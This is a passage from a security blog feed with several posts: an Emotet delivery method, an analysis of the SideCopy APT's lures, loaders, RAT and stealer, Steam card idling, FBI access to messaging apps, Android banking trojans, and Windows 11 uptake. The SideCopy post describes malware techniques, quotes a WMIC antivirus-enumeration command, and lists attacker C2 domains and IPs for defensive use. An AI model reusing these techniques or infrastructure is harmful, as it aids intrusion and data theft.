Subscribe to Malwarebytes feed
The Security Blog From Malwarebytes
Updated: 19 hours 32 min ago

Emotet being spread via malicious Windows App Installer packages

Thu, 12/02/2021 - 20:19

As reported by Cryptolaemus on Twitter, and demonstrated step by step by BleepingComputer, Emotet is now being distributed through malicious Windows App Installer packages that pretend to be Adobe PDF software.

How does the attack work?

To understand what Microsoft is supposed to do about this method, we need to look at how these attacks work. URLs are sent out to victims by using malspam. The emails are sent to appear as replies to existing conversations by using stolen reply-chain emails. In the email they ask the receiver to look at an attachment. Clicking the link brings the victim to a fake Google Drive page that prompts them to click a button to preview the PDF document.

If you use the “Preview PDF” button it triggers an ms-appinstaller URL that attempts to open a file with an  .appinstaller extension hosted on Microsoft Azure using URLs at * Appinstaller files mostly belong to App Installer by Microsoft. An .appinstaller file helps if you need multiple users to deploy your MSIX installation file. This is an XML file that you can create yourself or create, for example by using Visual Studio. The .appinstaller file specifies where your app is located and how to update it.

When attempting to open an .appinstaller file, the Windows browser will prompt if you wish to open the Windows App Installer program to proceed. In this case, once you agree, you will be shown an App Installer window prompting you to install the “Adobe PDF Component.” This malicious package looks like a legitimate Adobe application, as it has a legitimate Adobe PDF icon, a valid certificate which marks it as a ‘Trusted App’, and fake publisher information.

If a user chooses to proceed with the install—and why would they stop this far down the rabbit hole?—App Installer will download and install the malicious appxbundle hosted on Microsoft Azure. This bundle drops a .dll on the affected system and creates a startup entry for this .dll. This startup entry will automatically launch the DLL when a user logs into Windows. At that point you are infected with Emotet.

Hosting malicious files on Azure

Microsoft’s Azure cloud services have become an attractive option for cybercriminals to store malicious content. Not just for malicious files as in the case of Emotet, but also for phishing sites, other fraudulent sites, and command and control servers. Azure is certainly not alone, other content hosting sites like Google Drive, Dropbox, and Amazon’s web services are also abused to store malicious content. But critics are hard on Microsoft since it consider itself a security vendor. By the time of writing, the .appinstaller file was removed, but it was available for download longer than it should have been.

The URL for the .appinstaller returns a 404 error

While we understand how difficult it is to inspect everything that gets uploaded into your cloud service, and that you can’t study every new customer under a microscope, we also do not know how much time passed between the first report of this new Emotet distribution method and the actual takedown.

Microsoft is receiving flack because it is its cloud service hosting malware, its app installer is used in the process, and its Operating System (Windows) is the target of the attacks. Does that make it an enabler? Not really and certainly not voluntarily.


While we all thought and hoped that Emotet had kicked the bucket, it made a dramatic comeback a few weeks ago. And using new distribution methods is a clear sign that it is serious about the comeback.

So, don’t click those links, even if the URL looks trustworthy, the file icon looks legit, and the file is signed. Check with the alleged sender about whether the message really comes from them and is intended for you.

Stay safe, everyone!

The post Emotet being spread via malicious Windows App Installer packages appeared first on Malwarebytes Labs.

Categories: Techie Feeds

SideCopy APT: Connecting lures to victims, payloads to infrastructure

Thu, 12/02/2021 - 16:00

This blog post was authored by Hossein Jazi and the Threat Intelligence Team.

Last week, Facebook announced that back in August it had taken action against a Pakistani APT group known as SideCopy. Facebook describes how the threat actors used romantic lures to compromise targets in Afghanistan.

In this blog post we are providing additional details about SideCopy that have not been published before. We were able to have unique insights about victims and targeted countries as well as the kind of data the APT group was able to successfully exfiltrate. Among the information that was stolen is access to government portals, Facebook, Twitter and Google credentials, banking information, and password-protected documents.

In addition, we detail how this threat actor had started to use new initial infection vectors for its operations which include Microsoft Publisher documents and Trojanized applications. Finally, we detail a newly-observed stealer that has been used by this actor called AuTo stealer.

Newly observed lures

The SideCopy APT is a Pakistani threat actor that has been operating since at least 2019, mainly targeting South Asian countries and more specifically India and Afghanistan. Its name comes from its infection chain that tries to mimic that of the SideWinder APT. It has been reported that this actor has similarities with Transparent Tribe (APT36) and possibly is a subdivision of this actor. Cisco Talos and Seqrite have provided comprehensive reports on this actor’s activities.

The lures used by SideCopy APT are usually archive files that have embedded one of these files: Lnk, Microsoft Publisher or Trojanized Applications. These lures can be categorized into two main groups:

  • Targeted lures: These lures are specially crafted and designed to target specific victims. We believe this category is very well customized to target government or military officials. Here some of the examples:
      This archive file contains a Microsoft Publisher document that is a letter from “Mr Ahmad Shuja Jamal, former DG for International Relations and Regional Cooperation at the National Security Council of Afghanistan” to “Hamdullah Mohib, former National Security Adviser of Afghanistan”. This letter is about a “meeting with representatives of France and UK delegations of Afghanistan”. Most likely this lure has been used to target Afghanistan government officials and especially foreign affair related officials.
    • This archive file contains a malicious lnk file which loads a decoy PDF file. The decoy PDF file is: “Email facility address list of the ERE units: 20 Sept 2021”. This lure seems to be used to target the Indian Army and National Cadet Corps of India.
    • Similar to the previous one, this includes a malicious lnk that loads a decoy PDF file. The decoy is a curriculum of the course named “Living the values, a value-narrative to grass-root leadership” offered by NCERT (National Council of Educational Research and Training of India).
Figure 1: NSA meeting lure Figure 2: Email facility address list of the ERE units: 20 Sept 2021 Figure 3: Living the values course
  • Generic lures: These lures are mostly generic and most likely have been used in spam campaigns to collect emails and credentials to help the actor perform their targeted attacks. In this category we observed the following: (The first three lures are the ones reported as “romantic lures” in a Facebook report)
    • Using girl names as the archive file name such as ““: (showing girl pictures with an application) These archive files contain a list of images with the “.3d” extension and an application named “3Dviewer.exe” that needs to to be executed to load and view images. In fact, the executable is Trojanized and will contact the actor servers to download the malicious payloads.
    • image-random“: These zip files contains a malicious lnk file that shows a girl picture as a decoy.
    • Whatsapp-image-random“: These zip files contain a malicious lnk file that shows a girl picture as a decoy.
    •“: This archive file contains a Microsoft Publisher document that loads a Schengen Visa Application Form in English as decoy. This is used to target people who want to travel to European countries.
    •“: This archive contains a lnk that loads a resume as decoy. The name of the archive file usually is in this pattern “”
    • New“: This loads a document as decoy. We were not able to retrieve the lure in this case.
Figure 4: Schengen Visa Application Form Figure 5: 3DViewer.exe Victimology

As previously reported, the SideCopy APT has mainly targeted defense and armed forces personnel in the Indian subcontinent but there are not many reports about how successful these attacks were and what data was exfiltrated. The Malwarebytes Threat Intelligence team was able to identify some of the successful attacks operated by this APT. It is worth noting that those compromises happened before the Taliban completely took over Afghanistan. In fact, Facebook’s intervention in August matches with the timeline of indicators we recorded.

  • Administration Office of the President (AOP) of Afghanistan personnel: This actor has operated targeted spear phishing attacks on members of AOP and was able to gain access to ten of them and steal their credentials from different government services such as, internal service, bank services (Maiwand Bank) and personal accounts such as Google, Twitter and Facebook.
  • Ministry of Foreign affairs- Afghanistan: We have evidence that the actor infected one of the members of the Ministry of External affairs but it seems they were not able to collect any data from this victim.
  • Ministry of Finance, Afghanistan: The actor infected two members of MOF but mostly they were able to collect personal accounts such as Google and Facebook and Bank accounts (“”). They also exfiltrated documents that are password protected.
  • Afghanistan’s National Procurement Authority (NPA): The actor infected one person in NPA and were able to stead personal credentials including Twitter, Facebook, Instagram, Pinterest, Google and the account.
  • A shared computer, India: It seems the actor gained access to a shared machine and collected a lot of credentials from government and eduction services. It seems this machine has been infected using one of the generic lures.

The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards of several Afghani government officials.

Figure 6: Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan

The exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible that they have been already targeted by the actor or will be the future targets of this actor. There are also some confidential letters that we think the actor is planning to use for future lures.

Attacker infrastructure

We have uncovered the main command and control (C2) server used by the attacker to monitor and control their victims. Each archive file that is used by the attacker to send to victims is considered a unique package and each package has its own payloads including hta and executables that usually are hosted on compromised domains. The actor has a system named “Scout” to monitor each package. The Scout system has four users with English nicknames (Hendrick, Alexander, Hookes, Malone). It also defines teams that are responsible to manage each package.

Figure 7: Scout system

In this system, they have a dashboard that shows all the infected machines. Each row in the dashboard shows one package and its statistics which includes the IP address of the victim, package name, OS version, User-Agent, browser information, country and victim status.

Figure 8: Dashboard

The actor uses a different dashboard called Crusader to monitor the Action RAT statistics.

Figure 9: Crusader Analysis of the new attacks

As we mentioned earlier, the actor has used three different methods as its initial infection vector: lnk files, Microsoft Publisher files and Trojanized application. The lnk files have been well studied and what we have observed is very similar to what already has been reported, with only small changes. For example, we observed that they have updated the code of hta.dll and preBotHta.dll and added some more features.

In this section we provide the analysis for the other two variants: Microsoft Publisher and Trojanized Applications.

Microsoft Office Publisher

In this variant, attackers have embedded a Microsoft Office Publisher document in an archive file. We’ve identified two variants of the Office publisher documents:

  • Report to NSA Mohib – Meeting with FR, GE, UK – 12 Nov

Both of these documents were created in August 2021 and we believe they have been used in the most recent campaign. Both of these documents contains a simple macro that calls Shell function to call mshta.exe to download and execute a specified hta file.

Figure 10: Embedded macros

The hta file loads the loader DLL (PreBotHta.dll) into memory and then collects AV product names. The AV name along with the encoded payloads that need to be loaded by this loader are passed to the PinkAgain function.

Figure 11: HTA file

The loader is responsible for dropping both credwiz.exe and Duser.dll. Unlike what has been reported, in this case Duser.dll is not copied into different locations based on AV products and it is copied into C:\ProgramData\ShareIt for all AV products.

Figure 12: Loader dll

This loader just does some additional work based on the AV product. For example if the AV product is Avira it tries to download and execute an additional hta file to deploy additional payloads.

Figure 13: Additional payload execution based on the AV type

After dropping the required files onto the victim, it starts the “credwiz.exe” process. This executable sideloads the malicious payload “Duser.dll”. This payload has been written in Delphi (this is the Delphi variant of Action Rat) and compiled on October 2 2021.

All the commands, strings and domains in this RAT are base64 encoded. The malicious process starts by collecting hostname, username, OS version, OS architecture, Mac address and installed AV products (by executing cmd.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List) from the victim and sending them to the command and control server using a HTTP request ("").
It then goes into a loop and waits for commands from the server to execute them. This RAT has the capability to execute one of the following commands:

  • Command: Execute commands received from the server
  • Download: Download additional payloads
  • Drives: Get drive info
  • GetFiles: Get files info
  • Execute: Execute a specified payload using CreateProcessW
  • Upload: Upload files to server
Figure 14: Commands

After execution of each command it reports back the result to its server. The reporting url is different than the C2 url. The report type depends on the command, for example if the payload executes a command, it reports the following information to the server: Victim’s ID, the executed command, the command output and the error message if the command execution was not successful.

Trojanized Image Viewer Application (3DViewer.exe)

In this variant, the attacker has distributed an archive file including an application named 3Dviewer.exe and a set of images with “3d” extension that can be only opened by that executable.

It seems the attacker Trojanized an image viewer application named “3Dviewer” to download and execute a malicious HTA file using Mshta in addition to its normal function that can load and show the pictures. This executable has been compiled on October 26 2021. The rest of the process is similar to what we described in the previous section.

Figure 15: 3DViewer.exe AuTo Stealer

We also came across another Stealer used by this actor that has been written in C++. To the best of our knowledge this is a new Stealer used by SideCopy APT. A Loader has been used to drop and load an executable (credbiz.exe) that side loads the Stealer. We were able to identify two different variants of this Loader that have been used to load an HTTP version and TCP version of the Stealer. Both of these loaders and the Stealer components have been compiled on October 30 2021:


Based on the functionality, we can say this Loader is a C++ variant of PreBotHta.dll (C# Loader used to load other Rats used by this actor). This Loader is responsible for dropping the following files in C:\ProgramData\Oracle\ directory:

  • credwiz.exe executable and rename it as credbiz.exe.
  • TextShaping.dll (Stealer component that will be side loaded by credbiz.exe)
Figure 16: Drop credbiz and TextShaping

Similar to PreBotHta.Dll, it checks the installed AV product on the victim’s machine and performs additional actions based on the AV product name. For example if the AV is Avast, Avira, BitDefender or AVG it creates a batch file (sysboot.bat) and executes it by calling cmd.exe. This makes credbiz.exe persistence through the AutoRun registry key. If the installed AV is one of the Kaspersky, Symantec, Mcafee or QuickHeal it creates an lnk file (Win Setting Loader.lnk) for persistency in StartUp directory.

After performing the additional process, it executes credbiz.exe by calling CreateProcessW.

Figure 17: Additional functionality based of AV product TextShaping.dll (Stealer component)

The actor used two different variants of the Stealer Stealer: HTTP and TCP. The HTTP version performs the exfiltration over HTTP while the TCP variant performs all the exfiltration over TCP. This component also has an interesting unique PDB path: "D:\Project Alpha\HTTP Auto\app\Release\app.pdb"

This Stealer collects PowerPoint, Word, Excel and PDF documents, text files, database files and images and exfiltrates them to its server over HTTP or TCP. To exfiltrate the data using HTTP, it builds a request that is specific to data files being exfiltrated and sends them over an HTTP server. For example, when it wants to exfiltrate PowerPoint documents it builds the following request and sends them over HTTP:

Figure 18: Stealer

For other file types it adds the /stream related to the file type and exfiltrates them to server. Here are the list of them: /streamppt, /streamdoc, /streamxls, /streamdb, /streamtxt, /streampdf, /streamimg.

Before starting the stealing process, it collects the victim’s information including username, hostname, OS info and AV products and sends them to its server by adding “user_details” to the domain. Also, it collects file information from the victim’s machine and stores it in a file “Hostname_UserName.txt” and sends the file by using the “logs_receiver” command.


The SideCopy APT has been actively targeting government and military officials in South Asia. The group mainly uses archived files to target victims in spam or spear phishing campaigns. The archive files usually have an embedded lnk, Office or Trojanized application that are used to call mshta to download and execute an hta file. The hta files perform fileless payload execution to deploy one of the RATs associated with this actor such as AllaKore or Action Rat. Malwarebytes products can identify the initial infection vectors used by SideCopy and block them from execution.

NameIOCTypeDescriptionReport-to-NSA-Mohib-Meeting-with-FR-GE-UK.zip4E26CCAD3FC762EC869F7930A8457E4DMD5schengen_visa_application_form_english.zipC2831369728B7247193E2DB567900ABEMD5new document.zip689B9FDBF35B8CEFC266A92D1D05A814MD5Image-8765.zipD52021F350C9C2F8EE87D3B9C070704AMD5Image-8853.zipD99491117D3D96DA7D01597929BE6C8EMD5479_1000.zip7C0A49F3B4A012BADE8404A3BE353A48MD5Muniba.zipA65D3AB8618E7965B9AE4FAE558EB8F2MD5nisha.zip48C165124E151AA2A1F4909E0B34E99CMD5Whatsapp-Image-7569.zip0023A30B3F91FA9989E0843BBEB67CC1MD5Download-Maria-Gul-CV.zip5044027CCB27401B06515F0912EB534AMD5DP_TCP.exeec87ddad01869b58c4c0760a6a7d98f8MD5AuTo StealerDP_HTTP.exee246728aa4679051ed20355ae862b7efMD5AuTo Stealer TextShaping.dllc598a8406e2b9ec599ab9e6ec4e7d7c2MD5AuTo StealerTextShaping.dll5f49c816d7d2b6fa274041055cc88ba7MD5AuTo StealerPayloads

Domain/IPDescriptionafrepublic.xyzC2newsroom247.xyzC2afghannewsnetwork.comC2maajankidevisevasansthan.orgHost payloadsamsss.inHost payloadsscouttable.xyzC2securedesk.oneC2eurekawatersolution.comHost payloadsrepublicofaf.xyzC2securecheker.inHost payloadsappsstore.inC2scout.fontsplugins.comC2144.126.141.41C2C2s and Payloads Hosts Mitre attack techniques TacticidNameDetailsPhishingT1566.001Spear phishing AttachmentDistribute archive file as an spear phishing attachmentExecutionT1047Windows Management InstrumentationUses WMIC.EXE to obtain a system information
Uses WMIC.EXE to obtain a list of AntiViruses ExecutionT1059.003Command and Scripting Interpreter: Windows Command ShellStarts CMD.EXE for commands executionExecutionT1204.001User Execution: Malicious LinkExecutionT1204.002User Execution: Malicious FilepersistenceT1547.001Boot or Logon Autostart Execution: Registry Run Keys / Startup FolderDiscoveryT1012Query RegistryReads the computer nameDiscoveryT1082System information discoveryDiscoveryT1518.001Software Discovery: Security Software DiscoveryUses WMIC.EXE to obtain a list of AntiVirusesDefense EvasionT1218.005Signed binary proxy execution: mshtaStarts MSHTA.EXE for opening HTA or HTMLS files Defense EvasionT1140Deobfuscate/Decode Files or InformationUses base64 decodes to decode C2sDefense EvasionT1574.002Hijack Execution Flow: DLL Side-LoadingUses credwiz.exe to side load its malicious payloadsCollectionT1119Automated CollectionCollects db files, docs and pdfs automaticallyCollectionT1005Data from Local SystemCommand and Control T1071.001Application Layer Protocol: Web ProtocolsCommand and Control T1071.002Application Layer Protocol: File Transfer ProtocolsExfiltrationT1041Exfiltration Over C2 Channel

The post SideCopy APT: Connecting lures to victims, payloads to infrastructure appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Capcom Arcade Stadium’s record player numbers blamed on card mining

Wed, 12/01/2021 - 16:30

Some of my favourite retro video games are making waves on Steam, but not in the way you might think. Classics such as Strider, Ghosts n’ Goblins, and more are all available as content for Capcom Arcade Stadium. This is an emulator which lets you play 31 arcade games from the 80s/90s. The games themselves are paid downloadable content, but the main emulator download itself is free. It also comes with one free game as a taster of the full edition.

It didn’t have a great reception at launch, because people didn’t like titles being sold in bundles only. As such, it was something of a surprise to see it riding high at the top end of the Steam activity charts in the last few days.

Sure, the games can now be bought individually. But would that really equate to an all-time concurrent tally of 481,088 players? Did people really wake up this week and think “What we need in our lives is 3 different versions of Street Fighter 2”?

The numbers game

Make no mistake, these are some of the biggest numbers you can achieve on Steam and it typically requires a massive AAA+ title to achieve it. For example, right now the three top played games on Steam are:

  1. Counter Strike: Global Offensive with 507,995 players
  2. Dota 2 with 325,679 players
  3. PUBG: Battlegrounds with 150,498 players

These are all huge online games, played against other people. Yet somehow we have the archaic arcade emulator, with its one free game by default, storming into the top three.

These numbers are so vast, Capcom Arcade Station has managed to hit 8th place in the top records for most simultaneous players. What could have possibly caused this? The faithful translation of arcade controls to gamepads? The ability to rewind the game should you make a mistake? Customising the individual game’s arcade cabinet before loading up a title?

Nope, it’s bots.

How did bots cause the great player count inflation of 2021?

Generally when we talk about bots in gaming, we mean hacked accounts or PCs performing certain tasks. It could be a DDoS attack, or sending out phishing messages inside game chat, or some other nefarious activity.

In this case, the “bot” is something a little bit different. It’s not something caused by what happens inside the game itself. Rather, it’s a layer of virtual economy and digital goods driving what happens to the player count.

Before we get to the nitty gritty, it’s time to explain the ins and outs of Steam card trading.

Steam card trading

Sometimes folks get confused on this, so for clarity, there’s two types of “Steam card”. The first is an actual, physical gift card you can buy in stores. These cards have monetary amounts assigned to them, and they’re a way to preload your Steam account with credit. You then use it to purchase games from the store. You can also buy “digital” versions of these cards which perform the same function.

The other type of card, the one we’re focusing on, are Steam trading cards. These are items which are tied to certain games, but don’t exist within them. They’re essentially cool looking virtual cards with characters from the game on them. The more you play a game, the more likely the chance you’ll be given a free card drop. When you collect all of the cards for a game, you can create a badge for your Steam profile. At the same time, you’ll be given other community-centric items like emoticons, the possibility of discount coupons for other games, or even the option to bump up your Steam level (another profile feature).

The system is designed so you can’t just grab all of the cards by playing. There’s a limit on how many you’ll receive and then you need to get the rest by trading with friends, or buying from the Steam marketplace.

This is a very detailed system with a lot of depth to it. Steam trading is big business, and often one of the focal points for scams, phishes, and malware antics. However, that’s not the case here.

Rather, it appears to be users trying to game the system for their own ends. For once, nobody is compromising accounts and running off with a sack full of stolen logins.

Still, this begs the question: what is happening here?

The wonderful world of card mining

It’s not just Bitcoin hogging all the space in the mines these days. Steam cards can also be mined, and there’s a surprising number of tools available to do it. One of the most popular is something called ArchiSteamFarm. This is a third party tool you can log into with your Steam credentials, and it’ll tell you what can/can’t be farmed. If there are card drops available, you simply tell it which games of yours to “idle” on and we’re off to the card mining races. You don’t have to download the game in order to idle, which makes it super convenient for people wanting cards without gigabytes of downloads and wasted hard drive space.

This is where things get really interesting.

Steam cards usually only drop for paid titles. If you don’t buy the game, you can’t get cards. In this case, the base Capcom Arcade Simulator game is a free download with one free title included. This isn’t (and shouldn’t!) be enough to have cards start dropping.

However, something seems to have gone wrong. All of a sudden, people found they could obtain trading cards despite only having the free game. This meant a huge surge in botting activity to grab cards before someone at Valve—the company behind Steam—fixed it.

As a result, a massive amount of card miners fired up their tools (whether ArchiSteamFarm or something else entirely), and idled their way to sweet card victory. As above, there’s limitations on how many cards you can farm. Once you hit the limit, that’s it – no more mining on that game ever. You have to trade or buy the rest. So this is, essentially, people just wanting to get in on the ground floor of red hot card trading action.

Watching Steam achievement totals drop in real time

As this Ars Technica article notes, you can observe clues regarding the automated action taking place. One way to do this is by checking out Steam achievement numbers. Around 44.6% of people had gained the achievement for loading up a game for the first time a couple of days ago. Now, the number sits at just 7.9%. That’s lower than the previous figure in the article. The only way this number makes sense given the massive user numbers is if huge amounts of new game owners are using tools to “idle” while prospecting for card drops.

The leaky card pipeline has apparently been fixed, so no amount of idling will produce any more cards. This happens to games occasionally, most notably when an error caused card drops for Life is Strange 2. What usually happens after an incident like this is the market is flooded and card value plummets, so it’s probably a fraught time on the old trading card stock exchange or something.

When retro revivals are no more…

Unfortunately my dreams of a Strider revival off the back of massive player numbers and a sudden boom in retro gaming now seems unlikely. On the bright side, the peculiar rise in player numbers didn’t involve people up to no good with malware or phishing.

While Valve probably won’t be too pleased by the inadvertent rush on cards, that is at least one small mercy we can be thankful for.

The post Capcom Arcade Stadium’s record player numbers blamed on card mining appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Here’s what data the FBI can get from WhatsApp, iMessage, Signal, Telegram, and more

Wed, 12/01/2021 - 13:45

Not every secure messaging app is as safe as it would like us to think. And some are safer than others.

A recently disclosed FBI training document shows how much access to the content of encrypted messages from secure messaging services US law enforcement can gain and what they can learn about your usage of the apps.

The infographic shows details about iMessage, Line, Signal, Telegram, Threema, Viber, WeChat, WhatsApp, and Wickr. All of them are messaging apps that promise end-to-end encryption for their users. And while the FBI document does not say this isn’t true, it reveals what type of information law enforcement will be able to unearth from each of the listed services.

Note: A pen register is an electronic tool that can be used to capture data regarding all telephone numbers that are dialed from a specific phone line. So if you see that mentioned below it refers to the FBI’s ability to find out who you have been communicating with.


iMessage is Apple’s instant messaging service. It works across Macs, iPhones, and iPads. Using it on Android is hard because Apple uses a special end-to-end encryption system in iMessage that secures the messages from the device they’re sent on, through Apple’s servers, to the device receiving them. Because the messages are encrypted, the iMessage network is only usable by devices that know how to decrypt the messages. Here’s what the document says it can access for iMessage:

  • Message content limited.
  • Subpoena: Can render basic subscriber information.
  • 18 USC §2703(d): Can render 25 days of iMessage lookups and from a target number.
  • Pen Register: No capability.
  • Search Warrant: Can render backups of a target device; if target uses iCloud backup, the encryption keys should also be provided with content return. Can also acquire iMessages from iCloud returns if target has enabled Messages in iCloud.

Line is a freeware app for instant communications on electronic devices such as smartphones, tablets, and personal computers. In July 2016, Line Corporation turned on end-to-end encryption by default for all Line users, after it had earlier been available as an opt-in feature since October 2015. The document notes on Line:

  • Message content limited.
  • Suspect’s and/or victim’s registered information (profile image, display name, email address, phone number, LINE ID, date of registration, etc.)
  • Information on usage.
  • Maximum of seven days’ worth of specified users’ text chats (Only when end-to-end encryption has not been elected and applied and only when receiving an effective warrant; however, video, picture, files, location, phone call audio and other such data will not be disclosed).

Signal is a cross-platform centralized encrypted instant messaging service. Users can send one-to-one and group messages, which can include files, voice notes, images and videos. Signal uses standard cellular telephone numbers as identifiers and secures all communications to other Signal users with end-to-end encryption. The apps include mechanisms by which users can independently verify the identity of their contacts and the integrity of the data channel. The document notes about Signal:

  • No message content.
  • Date and time a user registered.
  • Last date of a user’s connectivity to the service.

This seems to be consistent with Signal’s claims.


Telegram is a freeware, cross-platform, cloud-based instant messaging (IM) system. The service also provides end-to-end encrypted video calling, VoIP, file sharing and several other features. There are also two official Telegram web twin apps—WebK and WebZ—and numerous unofficial clients that make use of Telegram’s protocol. The FBI document says about Telegram:

  • No message content.
  • No contact information provided for law enforcement to pursue a court order. As per Telegram’s privacy statement, for confirmed terrorist investigations, Telegram may disclose IP and phone number to relevant authorities.

Threema is an end-to-end encrypted mobile messaging app. Unlike other apps, it doesn’t require you to enter an email address or phone number to create an account. A user’s contacts and messages are stored locally, on each user’s device, instead of on the server. Likewise, your public keys reside on devices instead of the central servers. Threema uses the open-source library NaCl for encryption. The FBI document says it can access:

  • No message content.
  • Hash of phone number and email address, if provided by user.
  • Push Token, if push service is used.
  • Public Key
  • Date (no time) of Threema ID creation.
  • Date (no time) of last login.

Viber is a cross-platform messaging app that lets you send text messages, and make phone and video calls. Viber’s core features are secured with end-to-end encryption: calls, one-on-one messages, group messages, media sharing and secondary devices. This means that the encryption keys are stored only on the clients themselves and no one, not even Viber itself, has access to them. The FBI notes:

  • No message content.
  • Provides account (i.e. phone number)) registration data and IP address at time of creation.
  • Message history: time, date, source number, and destination number.

WeChat is a Chinese multi-purpose instant messaging, social media and mobile payment app. User activity on WeChat has been known to be analyzed, tracked and shared with Chinese authorities upon request as part of the mass surveillance network in China. WeChat uses symmetric AES encryption but does not use end-to-end encryption to encrypt users messages. The FBI has less access than the Chinese authorities and can access:

  • No message content.
  • Accepts account preservation letters and subpoenas, but cannot provide records for accounts created in China.
  • For non-China accounts, they can provide basic information (name, phone number, email, IP address), which is retained for as long as the account is active.

WhatsApp, is an American, freeware, cross-platform centralized instant messaging and VoIP service owned by Meta Platforms. It allows users to send text messages and voice messages, make voice and video calls, and share images, documents, user locations, and other content. WhatsApp’s end-to-end encryption is used when you message another person using WhatsApp Messenger. The FBI notes:

  • Message content limited.
  • Subpoena: Can render basic subscriber records.
  • Court order: Subpoena return as well as information like blocked users.
  • Search warrant: Provides address book contacts and WhatsApp users who have the target in their address book contacts.
  • Pen register: Sent every 15 minutes, provides source and destination for each message.
  • If target is using an iPhone and iCloud backups enabled, iCloud returns may contain WhatsApp data, to include message content.

Wickr has developed several secure messaging apps based on different customer needs: Wickr Me, Wickr Pro, Wickr RAM, and Wickr Enterprise. The Wickr instant messaging apps allow users to exchange end-to-end encrypted and content-expiring messages, including photos, videos, and file attachments. Wickr was founded in 2012 by a group of security experts and privacy advocates but was acquired by Amazon Web Services. The FBI notes:

  • No message content.
  • Date and time account created.
  • Type of device(s) app installed on.
  • Date of last use.
  • Number of messages.
  • Number of external IDs (email addresses and phone numbers) connected to the account, bot not to plaintext external IDs themselves.
  • Avatar image.
  • Limited records of recent changes to account setting such as adding or suspending a device (does not include message content or routing and delivery information).
  • Wickr version number.

If there is one thing clear from the information in this document it’s that most, if not all, of your messages are safe from prying eyes in these apps, unless you’re using WeChat in China. Based on the descriptions, you can check out which apps are available on your favorite platform and which of the bullet points are relevant to you, to decide which app is a good choice for you.

The safest way however is to make sure the FBI doesn’t consider you a person of interest. In those cases even using a special encrypted device can pose some risks.

Stay safe, everyone!

The post Here’s what data the FBI can get from WhatsApp, iMessage, Signal, Telegram, and more appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Have you downloaded that Android malware from the Play Store lately?

Wed, 12/01/2021 - 11:58

Security researchers have discovered banking Trojan apps on the Google Play Store, and say they have been downloaded by more than 300,000 Android users.

As you may know, banking Trojans are kitted for stealing banking data like your username and password, and two-factor authentication (2FA) codes that you use to login to your bank account. They also capable of stealing phone keystrokes, and taking screenshots of what you’re seeing on your phone as you use it. All these are done without the victim’s consent and without them noticing anything until it’s too late.

The particular malicious apps the ThreatFabric researchers found were disguised to look like apps that an Android user might normally search for, such as QR scanners, PDF scanners, cryptocurrency wallets, and fitness monitors. Knowing that a portion of Android users are aware that the Play Store often gets malware—thus are quite wary about what they download—these apps actually come with the functions they advertised, further alleviating any doubts in users minds about their legitimacy.

But, as users will soon realize, looking and acting (or sounding) like something they are expected to look and act like are only limited to ducks, as these apps begin to show their true intent after they have been installed.

So, how do these benign apps become fully malicious? The cybercriminals behind them introduce malicious code as updates to the apps—slowly and surely. It’s a common evasion tactic which gets their malicious app into the Play Store without raising alarms at the door. Note, however, that these apps can only be manually updated to have the Trojan code should the attackers desire it.

So, the human element is now introduced in an Android attack chain. Obviously, the attackers have adapted this method from the ransomware playbook.

If ransomware attackers can handpick their targets and rummage through files within their compromised networks, these Android attackers can handpick devices “infected” with their apps and manually start the download of the Trojan code in a specific region of the world. To illustrate, let’s say “Fitness App Alpha” is installed in one device in California, USA and one in Montreal, Canada. Bad Guy flicks the switch to have Trojan code downloaded into “Fitness App Alpha” in California. This means that “Fitness App Alpha” in California is now Trojanized, while the one in Montreal is not.

Code sample taken from the app where attackers can target Android users who are customers of certain financial institutions they are after. This method is used by actors behind the Anatsa campaign. (Source: ThreatFabric) Attackers cannot only pick their victims based on their region. They can also target Android users based on the device they use—a method used by those behind the Alien campaign. (Source: ThreatFabric)

According to ThreatFabric, filtering “makes automated detection a much harder strategy to adopt by any organization.”

Not only that, incrementally updating the app, location checking, and device checking are also methods that attackers use to ensure their app is running on actual Android devices and not on a security researcher’s testing environment.

“This incredible attention dedicated to evading unwanted attention renders automated malware detection less reliable,” the researchers further stated in their blog post. “Actors behind it took care of making their apps look legitimate and useful. There are large numbers of positive reviews for the apps. The number of installations and presence of reviews may convince Android users to install the app.”

In four months, four Android malware families have spread across the Google Play Store. They are Anatsa, Alien, Hydra, and Ermac. Their campaigns have fooled thousands of Android users, and we can only imagine how much they have already stolen from them until they were discovered and reported.

How to keep dodgy apps out of your phone

When looking for apps, make time to do your research. If you’re after, say, QR codes, searching for “the top QR codes” or “the best QR codes” may be a good start as there are dozens of articles on the internet about this very subject. If you trust the publisher of these articles, you can be assured that they have looked into these apps and tested these themselves before giving their recommendations.

Another way is to head straight to the Play Store and look for apps (a) with good reviews, (b) a large user base, and (c) that have been in the Play Store for quite some time now (at least 12 months). Be wary, of course, of reviews that could be fake. But if the app you want ticks most or all of the boxes I mentioned above, dig a little bit more deeper and find out what its problems are and why some users don’t like it.

You could also consider installing security software on your phone. We’d be remiss here if we didn’t mention that Malwarebytes has an Android product.

Lastly, now is probably a good time to also audit your apps and get rid of those that you no longer use or update. You’re safer this way, too.

The post Have you downloaded that Android malware from the Play Store lately? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Most people aren’t upgrading to Windows 11: Not the end of the world

Wed, 12/01/2021 - 11:26

Windows 11 is experiencing an apparent lack of uptake among Windows users. If this survey is accurate, less than 1% of 10 million PCs surveyed are running the new operating system. In fact, more machines are using Windows XP.

That may surprise you. It might even seem like a bit of an embarrassing failure for Microsoft. However, the low numbers could well be a very good thing overall. It was always going to be a slow uptake, and we’re going to look at some of the reasons why.

Low numbers are to be expected – and that’s fine

There are quite a few barriers to entry for anyone looking to upgrade to Windows 11. In fact, it’s not just businesses facing Windows headaches. It’s home users too, but perhaps for somewhat different reasons.

